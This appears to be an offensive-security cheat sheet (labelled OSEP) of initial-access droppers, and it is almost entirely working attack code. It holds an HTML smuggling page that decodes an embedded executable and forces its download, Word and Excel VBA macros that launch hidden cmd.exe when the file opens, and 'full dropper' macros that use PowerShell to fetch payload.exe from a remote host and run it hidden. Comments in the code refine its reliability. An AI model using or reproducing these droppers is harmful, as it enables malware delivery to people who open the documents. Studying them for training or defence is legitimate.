Cheatsheet-OSEP
Droppers
HTML
This saves the executable to the browser's Downloads folder, subject to the browser's download prompt and whatever download protection it applies to unknown executables (e.g. SmartScreen / Safe Browsing reputation checks), so "works" here means the file is written, not that it is trusted.
Encode your payload with `base64 payload.exe -w 0 | kitty +kitten clipboard` (any clipboard tool works; the important part is `-w 0`, so the output has no line breaks, because `atob()` rejects whitespace and the `...` placeholder) and paste the result in place of the `file` string below.
Adapt fileName
if needed.
Works as expected in:
- Chrome (anchor `download` path)
- Edge (legacy EdgeHTML via `msSaveBlob`; Chromium-based Edge does not expose `msSaveBlob` and takes the same anchor path as Chrome)
- Internet Explorer (`msSaveBlob`)
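<html>
<body>
<script>
// Decode a base64 string into an ArrayBuffer holding the raw payload bytes.
// window.atob throws InvalidCharacterError on anything that is not base64,
// so the placeholder `file` value below (with its trailing "...") must be
// replaced with a real, unbroken base64 string before this page is used.
function base64ToArrayBuffer(base64) {
    var binary_string = window.atob(base64);
    var len = binary_string.length;
    var bytes = new Uint8Array(len);
    for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
    return bytes.buffer;
}
/* base64 demon.x64.exe -w 0 | kitty +kitten clipboard */
var fileName = 'msfstaged.exe';
console.log('START');
// Truncated placeholder - paste the full base64 of the payload here.
var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAA...';
var data = base64ToArrayBuffer(file);
// 'application/octet-stream' is the registered type for arbitrary binary;
// the original 'octet/stream' is not a valid MIME type.
var blob = new Blob([data], { type: 'application/octet-stream' });
console.log('Before Elem');
if (window.navigator.msSaveBlob) {
    // msSaveBlob is a non-standard API of Internet Explorer and legacy
    // (EdgeHTML) Edge; Chromium-based Edge lacks it and falls through to the
    // anchor path below.
    console.log('Edge/Internet Explorer');
    window.navigator.msSaveBlob(blob, fileName);
}
else {
    console.log('Chrome/Firefox or others');
    var a = document.createElement('a');
    document.body.appendChild(a);
    a.style.display = 'none';
    var url = window.URL.createObjectURL(blob);
    a.href = url;
    a.download = fileName;
    a.click();
    // The click has already queued the download; release the object URL and
    // remove the helper anchor so nothing is left behind in the DOM.
    window.URL.revokeObjectURL(url);
    document.body.removeChild(a);
}
console.log('END');
</script>
</body>
</html>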
Office
Word
Basic example
`.docx` cannot contain macros; save the document as `.doc` (Word 97-2003 format) or `.docm` (macro-enabled) instead. Note that `Document_Open` only fires when it lives in the `ThisDocument` module, whereas `AutoOpen` works from any standard module.
Shell
method:
' Both open-time entry points hand off to MyMacro.
' Document_Open is a ThisDocument event handler; AutoOpen is a named auto macro.
Sub Document_Open()
    Call MyMacro
End Sub

Sub AutoOpen()
    Call MyMacro
End Sub

' Start a hidden cmd.exe through the VBA Shell function.
Sub MyMacro()
    Const CMD_LINE As String = "cmd.exe"
    Call Shell(CMD_LINE, vbHide)
End Sub
Windows Script Host
method:
' Both open-time entry points hand off to MyMacro.
Sub Document_Open()
    Call MyMacro
End Sub

Sub AutoOpen()
    Call MyMacro
End Sub

' Start a hidden cmd.exe via the Windows Script Host Shell object.
' Window style 0 = hidden; Run returns immediately because bWaitOnReturn is omitted.
Sub MyMacro()
    Dim wsh As Object
    Set wsh = CreateObject("Wscript.Shell")
    wsh.Run "cmd.exe", 0
End Sub
Full dropper and execution
Shell
method:
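Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

' Download payload.exe next to the open document, wait for it, then launch it hidden.
Sub MyMacro()
    ' Resolve the destination once and use it for BOTH the download and the launch.
    ' The original passed a bare 'payload.exe' to DownloadFile, which PowerShell resolves
    ' against its own working directory, not ActiveDocument.Path, so the launch step could
    ' point at a file that was written somewhere else.
    ' NOTE: ActiveDocument.Path is "" for a document that has never been saved - confirm
    ' this holds for your delivery method. The path is embedded in single quotes, so a
    ' path containing an apostrophe would break the PowerShell command line.
    Dim exePath As String
    exePath = ActiveDocument.Path & "\payload.exe"

    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', '" & exePath & "')"
    Shell str, vbHide

    ' Shell() returns immediately. Keep the original 6 s head start, then poll (bounded)
    ' until the file appears instead of launching blindly - Shell on a missing file raises
    ' runtime error 53 and surfaces an error dialog to the user. Dir() only proves the
    ' file exists, not that PowerShell has finished writing it; the head start covers that.
    Sleep 6
    Dim waited As Long
    Do While Dir(exePath) = "" And waited < 30
        Sleep 1
        waited = waited + 1
    Loop
    If Dir(exePath) <> "" Then
        Shell exePath, vbHide
    End If
End Sub

' Busy-wait for n seconds while keeping Word responsive (DoEvents pumps messages).
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub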
Windows Script Host
method:
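Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

' Download payload.exe next to the open document and launch it hidden.
Sub MyMacro()
    ' Resolve the destination once and use it for BOTH the download and the launch.
    ' The original passed a bare 'payload.exe' to DownloadFile, which PowerShell resolves
    ' against its own working directory, not ActiveDocument.Path, so the launch step could
    ' point at a file that was written somewhere else.
    ' NOTE: ActiveDocument.Path is "" for a document that has never been saved - confirm
    ' this holds for your delivery method.
    Dim exePath As String
    exePath = ActiveDocument.Path & "\payload.exe"

    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', '" & exePath & "')"

    Dim wsh As Object
    Set wsh = CreateObject("Wscript.Shell")
    ' Run's third argument (bWaitOnReturn = True) blocks until PowerShell exits, so the
    ' download has completed (or failed) before the launch; this replaces the fixed
    ' 6-second Sleep and the race it introduced. Run then returns the process exit code:
    ' 0 means DownloadFile did not throw. The Dir() check guards against a zero exit with
    ' no file (VBA's And does not short-circuit, but both operands are side-effect free).
    If wsh.Run(str, 0, True) = 0 And Dir(exePath) <> "" Then
        wsh.Run exePath, 0
    End If
End Sub

' Busy-wait for n seconds while keeping Word responsive (DoEvents pumps messages).
' No longer used by MyMacro above; kept for variants that still need a fixed delay.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub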
Excel
Basic example
Shell
method:
' Both open-time entry points hand off to MyMacro.
' Workbook_Open is a ThisWorkbook event handler; Auto_Open is a named auto macro.
Sub Workbook_Open()
    Call MyMacro
End Sub

Sub Auto_Open()
    Call MyMacro
End Sub

' Start a hidden cmd.exe through the VBA Shell function.
Sub MyMacro()
    Const CMD_LINE As String = "cmd.exe"
    Call Shell(CMD_LINE, vbHide)
End Sub
Windows Script Host
method:
' Both open-time entry points hand off to MyMacro.
Sub Workbook_Open()
    Call MyMacro
End Sub

Sub Auto_Open()
    Call MyMacro
End Sub

' Start a hidden cmd.exe via the Windows Script Host Shell object.
' Window style 0 = hidden; Run returns immediately because bWaitOnReturn is omitted.
Sub MyMacro()
    Dim wsh As Object
    Set wsh = CreateObject("Wscript.Shell")
    wsh.Run "cmd.exe", 0
End Sub
Full dropper and execution
Shell
method:
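Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

' Download payload.exe to a fixed path, wait for it, then launch it hidden.
Sub MyMacro()
    ' Single source of truth for the destination, reused in the download command.
    ' C:\Windows\Temp is writable for standard users on a default install, but it is a
    ' well-watched location; Environ("TEMP") is an alternative if that matters - confirm
    ' for the target environment.
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"

    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', '" & exePath & "')"
    Shell str, vbHide

    ' Shell() returns immediately. Keep the original 6 s head start, then poll (bounded)
    ' until the file appears instead of launching blindly - Shell on a missing file raises
    ' runtime error 53 and surfaces an error dialog to the user. Dir() only proves the
    ' file exists, not that PowerShell has finished writing it; the head start covers that.
    Sleep 6
    Dim waited As Long
    Do While Dir(exePath) = "" And waited < 30
        Sleep 1
        waited = waited + 1
    Loop
    If Dir(exePath) <> "" Then
        Shell exePath, vbHide
    End If
End Sub

' Busy-wait for n seconds while keeping Excel responsive (DoEvents pumps messages).
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub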
Windows Script Host
method:
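Sub Workbook_Open()
    MyMacro
End Sub

Sub Auto_Open()
    MyMacro
End Sub

' Download payload.exe to a fixed path and launch it hidden.
Sub MyMacro()
    ' Single source of truth for the destination, reused in the download command.
    ' C:\Windows\Temp is writable for standard users on a default install, but it is a
    ' well-watched location; Environ("TEMP") is an alternative if that matters - confirm
    ' for the target environment.
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"

    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', '" & exePath & "')"

    Dim wsh As Object
    Set wsh = CreateObject("Wscript.Shell")
    ' Run's third argument (bWaitOnReturn = True) blocks until PowerShell exits, so the
    ' download has completed (or failed) before the launch; this replaces the fixed
    ' 6-second Sleep and the race it introduced. Run then returns the process exit code:
    ' 0 means DownloadFile did not throw. The Dir() check guards against a zero exit with
    ' no file (VBA's And does not short-circuit, but both operands are side-effect free).
    If wsh.Run(str, 0, True) = 0 And Dir(exePath) <> "" Then
        wsh.Run exePath, 0
    End If
End Sub

' Busy-wait for n seconds while keeping Excel responsive (DoEvents pumps messages).
' No longer used by MyMacro above; kept for variants that still need a fixed delay.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub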